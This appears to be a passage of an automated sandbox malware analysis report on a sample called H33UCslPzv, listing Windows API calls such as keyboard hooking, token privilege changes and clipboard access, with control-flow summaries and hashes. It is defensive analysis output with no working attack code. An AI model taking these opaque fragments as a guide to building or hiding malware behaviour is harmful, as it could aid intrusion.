                                                                  control_flow_graph 263 388531f4-38854dbc 266 38854dc2-38854dc7 263->266 267 38854e6c-38854e8c 263->267 268 38854dc9-38854e00 266->268 269 38854e1a-38854e52 CallWindowProcW 266->269 273 38854e8f-38854e9c 267->273 276 38854e02-38854e08 268->276 277 38854e09-38854e18 268->277 270 38854e54-38854e5a 269->270 271 38854e5b-38854e6a 269->271 270->271 271->273 276->277 277->273
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 38854E41
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 90d9e18c6fbd60dab6470a459afddcfe5617b5e871e67e8a65bdf3a228e55169
                                                                  • Instruction ID: 2cffb5e6a1268f2a85c33e03301a360a6a09d35e711aca3922bbaf2706becaab
                                                                  • Opcode Fuzzy Hash: 90d9e18c6fbd60dab6470a459afddcfe5617b5e871e67e8a65bdf3a228e55169
                                                                  • Instruction Fuzzy Hash: 3F410AB9900309DFDB14CF9AC484B9ABBF5FF89310F24C859D519AB321D774AA41CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 279 d7360-d7365 280 d72eb-d72ed 279->280 281 d7367-d73fc DuplicateHandle 279->281 282 d73fe-d7404 281->282 283 d7405-d7422 281->283 282->283
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 000D73EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: fb3288663b5976641f0439c6696e11408bea34753bae4d81ecb14c4686fd9186
                                                                  • Instruction ID: bbc5888b0a5b715d04bb6e9dcf43981052f8577ba052f8383941432791d2da91
                                                                  • Opcode Fuzzy Hash: fb3288663b5976641f0439c6696e11408bea34753bae4d81ecb14c4686fd9186
                                                                  • Instruction Fuzzy Hash: D221D2B5900249DFDB10CFAAD584AEEBBF4EB48310F14845AE958A3750D378A9548FA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 286 d7368-d73fc DuplicateHandle 287 d73fe-d7404 286->287 288 d7405-d7422 286->288 287->288
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 000D73EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: eb23fde2a61cfef5e165e23e3b78dd262f0088d95f4c9549e8cb74906db91f42
                                                                  • Instruction ID: 3fad35908a274458472b9a39712604e8d1ecd40ea98649098bdc47908721004f
                                                                  • Opcode Fuzzy Hash: eb23fde2a61cfef5e165e23e3b78dd262f0088d95f4c9549e8cb74906db91f42
                                                                  • Instruction Fuzzy Hash: B621C4B5900349DFDB10CFAAD584ADEFBF4EB48310F14841AE958A7350D378A954CFA5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 291 d2260-d22b2 294 d22be-d22f0 SetWindowsHookExW 291->294 295 d22b4-d22bc 291->295 296 d22f9-d231e 294->296 297 d22f2-d22f8 294->297 295->294 297->296
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 46cf42f9f701688de435174da86dc048dce86af0fa1cb81175b0274f26d22402
                                                                  • Instruction ID: 7445e297d88c7d1a2b7baaa96f2a845953e32c74cca5e45a8635d6247b302c95
                                                                  • Opcode Fuzzy Hash: 46cf42f9f701688de435174da86dc048dce86af0fa1cb81175b0274f26d22402
                                                                  • Instruction Fuzzy Hash: 252104759002099FDB54CFAAC844BEEFBF5AF88320F14842AE459A7250C778A944CFA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 302 d2268-d22b2 304 d22be-d22f0 SetWindowsHookExW 302->304 305 d22b4-d22bc 302->305 306 d22f9-d231e 304->306 307 d22f2-d22f8 304->307 305->304 307->306
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: fccea0983f663d014642fbd13621f6779e81c7ed39401e433b914894f371c155
                                                                  • Instruction ID: cd853ae1c88f70e6e8c727ebebfd01c190cfb099c5a90d64c725b43adc3530c8
                                                                  • Opcode Fuzzy Hash: fccea0983f663d014642fbd13621f6779e81c7ed39401e433b914894f371c155
                                                                  • Instruction Fuzzy Hash: 4521E5759002099FDB14CFAAD944BEEFBF5AF88310F14842AE459A7350C775A944CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 477dfbbc5faf3a862d3b6b81e8acedf871ae271cd33fc29fcdc0ba48f5879df3
                                                                  • Instruction ID: 1c682eccc1e13f88bea32fbb881b36541b333488fabb8f3e5939f922d53de8a9
                                                                  • Opcode Fuzzy Hash: 477dfbbc5faf3a862d3b6b81e8acedf871ae271cd33fc29fcdc0ba48f5879df3
                                                                  • Instruction Fuzzy Hash: 40212571544644DFDF15DF10D9C0B2ABFA5FB98318F24C16AE9090B246C336D856EBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb85154ee1e73b9a7c3ccd103bb6deec59e8694dbb5ae7cd538ccccc28ddca31
                                                                  • Instruction ID: 772f00df2196d04bf5ef71494ae94d3454a56733aef671cf46f5bb65dd3e4918
                                                                  • Opcode Fuzzy Hash: eb85154ee1e73b9a7c3ccd103bb6deec59e8694dbb5ae7cd538ccccc28ddca31
                                                                  • Instruction Fuzzy Hash: 89213771544340EFDF14DF10D9C0F2ABBA5FB94324F24C16AE9090B256C336E856EBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721904604.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ad000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a189437e4b4dbfad5d00d6b77d91565c15a55fb8250d1b41cabb442aa54c67b8
                                                                  • Instruction ID: eb57543b193dadf89541a587a0e3c811cc36c74859aab93ab083ae17e415839e
                                                                  • Opcode Fuzzy Hash: a189437e4b4dbfad5d00d6b77d91565c15a55fb8250d1b41cabb442aa54c67b8
                                                                  • Instruction Fuzzy Hash: DD2126B1604344FFDB14DF90D9C0B2ABBA5FB89314F24C56ED90A4B692C736D846CB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
                                                                  • Instruction ID: ce1e217f1a8710762b0eafd16ad6b635711e00165f08018c25193c3800d3738c
                                                                  • Opcode Fuzzy Hash: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
                                                                  • Instruction Fuzzy Hash: 4C112676504280DFCF11CF10D5C4B56BFB2FB94324F28C1AAD8490B656C33AE856DBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
                                                                  • Instruction ID: 6aa8e48fc0824ab184da9cbb11d9aad87b6e994f386729e1e887ab8f84c2f94a
                                                                  • Opcode Fuzzy Hash: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
                                                                  • Instruction Fuzzy Hash: B711E172504640CFCF11CF10D5C0B16BFA2FB84314F28C2AAD8090B656C33AD856DBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2721904604.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ad000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca8490141c5683cf716b0a9b8ed7578e2fbd6c5bc2cd125330644b42239aa3c7
                                                                  • Instruction ID: de1bdd91e81a69d180bffc81809348a452a0ac48835baea2cc056ea5f1ed9bc0
                                                                  • Opcode Fuzzy Hash: ca8490141c5683cf716b0a9b8ed7578e2fbd6c5bc2cd125330644b42239aa3c7
                                                                  • Instruction Fuzzy Hash: D711DD75504280EFDB05CF50D9C4B15BFB1FB85318F28C6AAD84A4BA56C33AD84ACB62
                                                                  APIs
                                                                    • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                    • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                  • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                  • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                  • GetCommandLineA.KERNEL32(007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                  • CharNextA.USER32(00000000,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                  • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                  • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                  • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                  • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                  • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                  • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                  • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                  • ExitProcess.KERNEL32 ref: 00403588
                                                                  • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                  • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                  • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                  • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                  • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                  • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                  • CopyFileA.KERNEL32(007AAC00,0079E108,00000001), ref: 0040364A
                                                                  • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                  • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                  • ExitProcess.KERNEL32 ref: 0040372A
                                                                    • Part of subcall function 004059B0: CharNextA.USER32(?,00403355,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 004059BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$FileProcess$Exit$CharCurrentDeleteDirectoryEnvironmentHandleNextPathTempTokenVariableWindows$AddressAdjustCloseCommandCopyInfoInitializeLineLookupModuleOpenPrivilegePrivilegesProcUninitializeValuelstrcmpilstrlen
                                                                  • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Vx+$\Temp$~nsu
                                                                  • API String ID: 626260513-4144396316
                                                                  • Opcode ID: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                  • Instruction ID: 8af8fcedd10493f8e80c4eada79d0bae115e97f9cb4a2bc1da61e0caac86d092
                                                                  • Opcode Fuzzy Hash: f7d9469de542fe56ff305c7c8b091c3c8799d7bb7494c8b2633f7a123844b828
                                                                  • Instruction Fuzzy Hash: 0F91E270144741BAD7106F759D49E2F3EACAF8630AF05043EF581B61E2DB7C8A158B2E
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(?,?), ref: 004057DE
                                                                  • lstrcatA.KERNEL32(007A0550,\*.*,007A0550,?,?), ref: 00405826
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,007A0550,?,?), ref: 00405847
                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,007A0550,?,?), ref: 0040584D
                                                                  • FindFirstFileA.KERNEL32(007A0550,?,?,?,0040A014,?,007A0550,?,?), ref: 0040585E
                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                  • FindClose.KERNEL32(00000000), ref: 0040591C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: \*.*
                                                                  • API String ID: 2035342205-1173974218
                                                                  • Opcode ID: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                  • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                  • Opcode Fuzzy Hash: 431781be1718a0d33c081e233ae80cc558f5881f14e6cb9e5308166eef8fd087
                                                                  • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404A97
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404AA4
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AF3
                                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404B0A
                                                                  • SetWindowLongA.USER32(?,000000FC,00405088), ref: 00404B24
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B36
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B4A
                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404B60
                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6C
                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B7C
                                                                  • DeleteObject.GDI32(00000110), ref: 00404B81
                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAC
                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BB8
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C52
                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C82
                                                                    • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE
                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C96
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404CC4
                                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CD2
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404CE2
                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DDD
                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E42
                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E57
                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E7B
                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E9B
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404EB0
                                                                  • GlobalFree.KERNEL32(?), ref: 00404EC0
                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F39
                                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 00404FE2
                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FF1
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405011
                                                                  • ShowWindow.USER32(?,00000000), ref: 0040505F
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040506A
                                                                  • ShowWindow.USER32(00000000), ref: 00405071
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 2564846305-813528018
                                                                  • Opcode ID: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                  • Instruction ID: a268e52f59abad667f40846b9330857a26eef97fbfd8c04b7b0b2c1eeebe026e
                                                                  • Opcode Fuzzy Hash: 4399c830adbd7d59991cca11517547b5d533efcb757e40cb4398398cc859d0e5
                                                                  • Instruction Fuzzy Hash: 56026DB0900209EFEB109FA8DD45AAE7BB5FB84314F10813AF610B62E1D7789D52DF58
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                  • GetClientRect.USER32(?,?), ref: 004052FD
                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                  • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                    • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405427
                                                                  • ShowWindow.USER32(00000000), ref: 0040544A
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                  • ShowWindow.USER32(00000008), ref: 00405497
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                  • CreatePopupMenu.USER32 ref: 004054DC
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054F1
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                  • OpenClipboard.USER32(00000000), ref: 00405576
                                                                  • EmptyClipboard.USER32 ref: 0040557C
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004055C7
                                                                  • CloseClipboard.USER32 ref: 004055CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID:
                                                                  • API String ID: 590372296-0
                                                                  • Opcode ID: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                  • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                  • Opcode Fuzzy Hash: 84782df16d7ec059bf83c821ddbfeaa0f78f9d0c9a83925ce920f2e68e6ea0e3
                                                                  • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                  • ShowWindow.USER32(?), ref: 00403C00
                                                                  • DestroyWindow.USER32 ref: 00403C14
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                  • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D1A
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001), ref: 00403D8F
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                  • EnableWindow.USER32(?,?), ref: 00403E68
                                                                  • EnableWindow.USER32(?,?), ref: 00403E83
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E99
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EB8
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                  • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                  • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                  • String ID:
                                                                  • API String ID: 184305955-0
                                                                  • Opcode ID: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                  • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
